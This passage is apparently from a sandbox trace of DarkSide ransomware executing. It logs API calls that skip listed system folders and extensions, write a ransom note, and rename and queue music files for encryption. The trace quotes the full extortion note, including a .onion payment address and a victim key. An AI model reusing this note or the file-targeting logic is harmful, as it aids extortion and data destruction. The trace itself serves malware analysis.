Seed=0xcb1018) returned 0x29fd9c9b [0159.985] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2b70094, Length=0x80) returned 0x2d720fb6 [0159.985] RtlComputeCrc32 (PartialCrc=0xfb6, Buffer=0x2b70094, Length=0x80) returned 0x1de5e88d [0159.985] RtlComputeCrc32 (PartialCrc=0xe88d, Buffer=0x2b70094, Length=0x80) returned 0xba19fea6 [0159.985] RtlComputeCrc32 (PartialCrc=0xfea6, Buffer=0x2b70094, Length=0x80) returned 0x4fe81035 [0159.985] RtlComputeCrc32 (PartialCrc=0x1035, Buffer=0x2b70094, Length=0x80) returned 0x90d71e35 [0159.985] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0159.985] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3272078) returned 1 [0159.985] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3282080) returned 1 [0159.985] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd12108e0, ftCreationTime.dwHighDateTime=0x1d5de0a, ftLastAccessTime.dwLowDateTime=0xbe5bc040, ftLastAccessTime.dwHighDateTime=0x1d5e758, ftLastWriteTime.dwLowDateTime=0xbe5bc040, ftLastWriteTime.dwHighDateTime=0x1d5e758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LPnP0zZ7L", cAlternateFileName="LPNP0Z~1")) returned 1 [0159.985] _wcsicmp (_Str1="$recycle.bin", _Str2="LPnP0zZ7L") returned -72 [0159.985] wcslen (_String="$recycle.bin") returned 0xc [0159.985] _wcsicmp (_Str1="config.msi", _Str2="LPnP0zZ7L") returned -9 [0159.985] wcslen (_String="config.msi") returned 0xa [0159.985] _wcsicmp (_Str1="$windows.~bt", _Str2="LPnP0zZ7L") returned -72 [0159.985] wcslen (_String="$windows.~bt") returned 0xc [0159.985] _wcsicmp (_Str1="$windows.~ws", _Str2="LPnP0zZ7L") returned -72 [0159.985] wcslen (_String="$windows.~ws") returned 0xc [0159.985] _wcsicmp (_Str1="windows", _Str2="LPnP0zZ7L") returned 11 [0159.985] wcslen (_String="windows") returned 0x7 [0159.985] _wcsicmp (_Str1="appdata", _Str2="LPnP0zZ7L") returned -11 [0159.985] wcslen (_String="appdata") returned 0x7 [0159.985] _wcsicmp (_Str1="application data", _Str2="LPnP0zZ7L") returned -11 [0159.985] wcslen (_String="application data") returned 0x10 [0159.985] _wcsicmp (_Str1="boot", _Str2="LPnP0zZ7L") returned -10 [0159.986] wcslen (_String="boot") returned 0x4 [0159.986] _wcsicmp (_Str1="google", _Str2="LPnP0zZ7L") returned -5 [0159.986] wcslen (_String="google") returned 0x6 [0159.986] _wcsicmp (_Str1="mozilla", _Str2="LPnP0zZ7L") returned 1 [0159.986] wcslen (_String="mozilla") returned 0x7 [0159.986] _wcsicmp (_Str1="program files", _Str2="LPnP0zZ7L") returned 4 [0159.986] wcslen (_String="program files") returned 0xd [0159.986] _wcsicmp (_Str1="program files (x86)", _Str2="LPnP0zZ7L") returned 4 [0159.986] wcslen (_String="program files (x86)") returned 0x13 [0159.986] _wcsicmp (_Str1="programdata", _Str2="LPnP0zZ7L") returned 4 [0159.986] wcslen (_String="programdata") returned 0xb [0159.986] _wcsicmp (_Str1="system volume information", _Str2="LPnP0zZ7L") returned 7 [0159.986] wcslen (_String="system volume information") returned 0x19 [0159.986] _wcsicmp (_Str1="tor browser", _Str2="LPnP0zZ7L") returned 8 [0159.986] wcslen (_String="tor browser") returned 0xb [0159.986] _wcsicmp (_Str1="windows.old", _Str2="LPnP0zZ7L") returned 11 [0159.986] wcslen (_String="windows.old") returned 0xb [0159.986] _wcsicmp (_Str1="intel", _Str2="LPnP0zZ7L") returned -3 [0159.986] wcslen (_String="intel") returned 0x5 [0159.986] _wcsicmp (_Str1="msocache", _Str2="LPnP0zZ7L") returned 1 [0159.986] wcslen (_String="msocache") returned 0x8 [0159.986] _wcsicmp (_Str1="perflogs", _Str2="LPnP0zZ7L") returned 4 [0159.986] wcslen (_String="perflogs") returned 0x8 [0159.986] _wcsicmp (_Str1="x64dbg", _Str2="LPnP0zZ7L") returned 12 [0159.986] wcslen (_String="x64dbg") returned 0x6 [0159.986] _wcsicmp (_Str1="public", _Str2="LPnP0zZ7L") returned 4 [0159.987] wcslen (_String="public") returned 0x6 [0159.987] _wcsicmp (_Str1="all users", _Str2="LPnP0zZ7L") returned -11 [0159.987] wcslen (_String="all users") returned 0x9 [0159.987] _wcsicmp (_Str1="default", _Str2="LPnP0zZ7L") returned -8 [0159.987] wcslen (_String="default") returned 0x7 [0159.987] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\*" [0159.987] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\*") returned 0x37 [0159.987] wcscpy (in: _Dest=0x32500d4, _Source="LPnP0zZ7L" | out: _Dest="LPnP0zZ7L") returned="LPnP0zZ7L" [0159.987] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3272078 [0159.987] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3282080 [0159.988] wcscpy (in: _Dest=0x3272078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L" [0159.988] GetNamedSecurityInfoW () returned 0x0 [0159.988] SetEntriesInAclW () returned 0x0 [0159.988] SetNamedSecurityInfoW () returned 0x0 [0159.992] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22bb68) returned 1 [0159.992] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e3ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0159.992] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l")) returned 1 [0159.992] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0159.992] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0159.993] WriteFile (in: hFile=0x1bc, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e3bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e3bc*=0x7ca, lpOverlapped=0x0) returned 1 [0159.993] CloseHandle (hObject=0x1bc) returned 1 [0159.994] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0159.994] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l")) returned 0x10 [0159.994] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\") returned="" [0159.994] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\") returned 0x40 [0159.994] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\*", fInfoLevelId=0x0, lpFindFileData=0x32e61c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e61c) returned 0x154208 [0159.994] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd12108e0, ftCreationTime.dwHighDateTime=0x1d5de0a, ftLastAccessTime.dwLowDateTime=0x8d1038e0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8d1038e0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.995] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x167c30, ftCreationTime.dwHighDateTime=0x1d5d829, ftLastAccessTime.dwLowDateTime=0xc76460a0, ftLastAccessTime.dwHighDateTime=0x1d5e354, ftLastWriteTime.dwLowDateTime=0xc76460a0, ftLastWriteTime.dwHighDateTime=0x1d5e354, nFileSizeHigh=0x0, nFileSizeLow=0x1510d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ablm5q4G.mp3", cAlternateFileName="")) returned 1 [0159.995] _wcsicmp (_Str1="Ablm5q4G.mp3", _Str2="README.c06622a1.TXT") returned -17 [0159.995] wcsstr (_Str="Ablm5q4G.mp3", _SubStr="README") returned 0x0 [0159.995] _wcsicmp (_Str1="autorun.inf", _Str2="Ablm5q4G.mp3") returned 19 [0159.995] wcslen (_String="autorun.inf") returned 0xb [0159.995] _wcsicmp (_Str1="boot.ini", _Str2="Ablm5q4G.mp3") returned 1 [0159.995] wcslen (_String="boot.ini") returned 0x8 [0159.995] _wcsicmp (_Str1="bootfont.bin", _Str2="Ablm5q4G.mp3") returned 1 [0159.995] wcslen (_String="bootfont.bin") returned 0xc [0159.995] _wcsicmp (_Str1="bootsect.bak", _Str2="Ablm5q4G.mp3") returned 1 [0159.995] wcslen (_String="bootsect.bak") returned 0xc [0159.995] _wcsicmp (_Str1="desktop.ini", _Str2="Ablm5q4G.mp3") returned 3 [0159.995] wcslen (_String="desktop.ini") returned 0xb [0159.995] _wcsicmp (_Str1="iconcache.db", _Str2="Ablm5q4G.mp3") returned 8 [0159.995] wcslen (_String="iconcache.db") returned 0xc [0159.995] _wcsicmp (_Str1="ntldr", _Str2="Ablm5q4G.mp3") returned 13 [0159.995] wcslen (_String="ntldr") returned 0x5 [0159.995] _wcsicmp (_Str1="ntuser.dat", _Str2="Ablm5q4G.mp3") returned 13 [0159.995] wcslen (_String="ntuser.dat") returned 0xa [0159.996] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Ablm5q4G.mp3") returned 13 [0159.996] wcslen (_String="ntuser.dat.log") returned 0xe [0159.996] _wcsicmp (_Str1="ntuser.ini", _Str2="Ablm5q4G.mp3") returned 13 [0159.996] wcslen (_String="ntuser.ini") returned 0xa [0159.996] _wcsicmp (_Str1="thumbs.db", _Str2="Ablm5q4G.mp3") returned 19 [0159.996] wcslen (_String="thumbs.db") returned 0x9 [0159.996] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0159.996] wcslen (_String="386") returned 0x3 [0159.996] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0159.996] wcslen (_String="adv") returned 0x3 [0159.996] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0159.996] wcslen (_String="ani") returned 0x3 [0159.996] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0159.996] wcslen (_String="bat") returned 0x3 [0159.996] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0159.996] wcslen (_String="bin") returned 0x3 [0159.996] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0159.996] wcslen (_String="cab") returned 0x3 [0159.996] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0159.996] wcslen (_String="cmd") returned 0x3 [0159.996] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0159.996] wcslen (_String="com") returned 0x3 [0159.996] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0159.996] wcslen (_String="cpl") returned 0x3 [0159.996] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0159.996] wcslen (_String="cur") returned 0x3 [0159.996] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0159.996] wcslen (_String="deskthemepack") returned 0xd [0159.996] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0159.996] wcslen (_String="diagcab") returned 0x7 [0159.996] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0159.996] wcslen (_String="diagcfg") returned 0x7 [0159.996] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0159.996] wcslen (_String="diagpkg") returned 0x7 [0159.996] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0159.997] wcslen (_String="dll") returned 0x3 [0159.997] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0159.997] wcslen (_String="drv") returned 0x3 [0159.997] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0159.997] wcslen (_String="exe") returned 0x3 [0159.997] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0159.997] wcslen (_String="hlp") returned 0x3 [0159.997] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0159.997] wcslen (_String="icl") returned 0x3 [0159.997] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0159.997] wcslen (_String="icns") returned 0x4 [0159.997] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0159.997] wcslen (_String="ico") returned 0x3 [0159.997] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0159.997] wcslen (_String="ics") returned 0x3 [0159.997] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0159.997] wcslen (_String="idx") returned 0x3 [0159.997] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0159.997] wcslen (_String="ldf") returned 0x3 [0159.997] _wcsicmp (_Str1="lnk", _Str2="mp3") returned -1 [0159.997] wcslen (_String="lnk") returned 0x3 [0159.997] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0159.997] wcslen (_String="mod") returned 0x3 [0159.997] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0159.997] wcslen (_String="mpa") returned 0x3 [0159.997] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0159.997] wcslen (_String="msc") returned 0x3 [0159.997] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0159.997] wcslen (_String="msp") returned 0x3 [0159.997] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0159.997] wcslen (_String="msstyles") returned 0x8 [0159.997] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0159.997] wcslen (_String="msu") returned 0x3 [0159.997] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0159.997] wcslen (_String="nls") returned 0x3 [0159.997] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0159.997] wcslen (_String="nomedia") returned 0x7 [0159.998] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0159.998] wcslen (_String="ocx") returned 0x3 [0159.998] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0159.998] wcslen (_String="prf") returned 0x3 [0159.998] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0159.998] wcslen (_String="ps1") returned 0x3 [0159.998] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0159.998] wcslen (_String="rom") returned 0x3 [0159.998] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0159.998] wcslen (_String="rtp") returned 0x3 [0159.998] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0159.998] wcslen (_String="scr") returned 0x3 [0159.998] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0159.998] wcslen (_String="shs") returned 0x3 [0159.998] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0159.998] wcslen (_String="spl") returned 0x3 [0159.998] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0159.998] wcslen (_String="sys") returned 0x3 [0159.998] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0159.998] wcslen (_String="theme") returned 0x5 [0159.998] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0159.998] wcslen (_String="themepack") returned 0x9 [0159.998] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0159.998] wcslen (_String="wpx") returned 0x3 [0159.998] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0159.998] wcslen (_String="lock") returned 0x4 [0159.998] _wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0159.998] wcslen (_String="key") returned 0x3 [0159.998] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0159.998] wcslen (_String="hta") returned 0x3 [0159.998] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0159.998] wcslen (_String="msi") returned 0x3 [0159.998] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0159.998] wcslen (_String="pdb") returned 0x3 [0159.998] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0159.998] wcslen (_String="sqlite") returned 0x6 [0159.998] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l")) returned 0x10 [0159.999] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a2090 [0159.999] wcscpy (in: _Dest=0x32a2090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L" [0159.999] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L") returned 0x3f [0159.999] wcscpy (in: _Dest=0x32a2110, _Source="Ablm5q4G.mp3" | out: _Dest="Ablm5q4G.mp3") returned="Ablm5q4G.mp3" [0159.999] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\Ablm5q4G.mp3", dwFileAttributes=0x80) returned 1 [0159.999] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\Ablm5q4G.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l\\ablm5q4g.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0159.999] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.000] ReadFile (in: hFile=0x1a4, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0160.001] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0x31876a62 [0160.001] RtlComputeCrc32 (PartialCrc=0x6a62, Buffer=0x32e4a4, Length=0x80) returned 0x3c6e222b [0160.001] RtlComputeCrc32 (PartialCrc=0x222b, Buffer=0x32e4a4, Length=0x80) returned 0x571ba4b2 [0160.001] RtlComputeCrc32 (PartialCrc=0xa4b2, Buffer=0x32e4a4, Length=0x80) returned 0xc7c467c [0160.001] RtlComputeCrc32 (PartialCrc=0x467c, Buffer=0x32e4a4, Length=0x80) returned 0x82839217 [0160.001] CloseHandle (hObject=0x1a4) returned 1 [0160.001] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b2098 [0160.002] wcscpy (in: _Dest=0x32b2098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\Ablm5q4G.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\Ablm5q4G.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\Ablm5q4G.mp3" [0160.002] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\Ablm5q4G.mp3") returned 0x4c [0160.002] wcscpy (in: _Dest=0x32b2130, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0160.002] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\Ablm5q4G.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l\\ablm5q4g.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\Ablm5q4G.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l\\ablm5q4g.mp3.c06622a1"), dwFlags=0x8) returned 1 [0160.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\Ablm5q4G.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l\\ablm5q4g.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a4 [0160.004] CreateIoCompletionPort (FileHandle=0x1a4, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0160.004] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3480020 [0160.012] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x59e6c61 [0160.012] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x122416ec [0160.012] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1053197e [0160.012] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x65c28447 [0160.012] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3a7302be [0160.012] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x75fce7d0 [0160.012] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xe42e282 [0160.012] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xf519faa [0160.015] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3480094, Length=0x80) returned 0xf0f8fbda [0160.015] RtlComputeCrc32 (PartialCrc=0xfbda, Buffer=0x3480094, Length=0x80) returned 0x43739e42 [0160.015] RtlComputeCrc32 (PartialCrc=0x9e42, Buffer=0x3480094, Length=0x80) returned 0xed9a7920 [0160.015] RtlComputeCrc32 (PartialCrc=0x7920, Buffer=0x3480094, Length=0x80) returned 0x98807a80 [0160.015] RtlComputeCrc32 (PartialCrc=0x7a80, Buffer=0x3480094, Length=0x80) returned 0x7e41a17b [0160.015] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0160.015] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a2090) returned 1 [0160.015] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b2098) returned 1 [0160.015] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d2e300, ftCreationTime.dwHighDateTime=0x1d5dc28, ftLastAccessTime.dwLowDateTime=0x179ea8a0, ftLastAccessTime.dwHighDateTime=0x1d5d8e2, ftLastWriteTime.dwLowDateTime=0x179ea8a0, ftLastWriteTime.dwHighDateTime=0x1d5d8e2, nFileSizeHigh=0x0, nFileSizeLow=0x1417c, dwReserved0=0x0, dwReserved1=0x0, cFileName="CZr_rmhXD6Ex6.mp3", cAlternateFileName="CZR_RM~1.MP3")) returned 1 [0160.015] _wcsicmp (_Str1="CZr_rmhXD6Ex6.mp3", _Str2="README.c06622a1.TXT") returned -15 [0160.015] wcsstr (_Str="CZr_rmhXD6Ex6.mp3", _SubStr="README") returned 0x0 [0160.015] _wcsicmp (_Str1="autorun.inf", _Str2="CZr_rmhXD6Ex6.mp3") returned -2 [0160.016] wcslen (_String="autorun.inf") returned 0xb [0160.016] _wcsicmp (_Str1="boot.ini", _Str2="CZr_rmhXD6Ex6.mp3") returned -1 [0160.016] wcslen (_String="boot.ini") returned 0x8 [0160.016] _wcsicmp (_Str1="bootfont.bin", _Str2="CZr_rmhXD6Ex6.mp3") returned -1 [0160.016] wcslen (_String="bootfont.bin") returned 0xc [0160.016] _wcsicmp (_Str1="bootsect.bak", _Str2="CZr_rmhXD6Ex6.mp3") returned -1 [0160.016] wcslen (_String="bootsect.bak") returned 0xc [0160.016] _wcsicmp 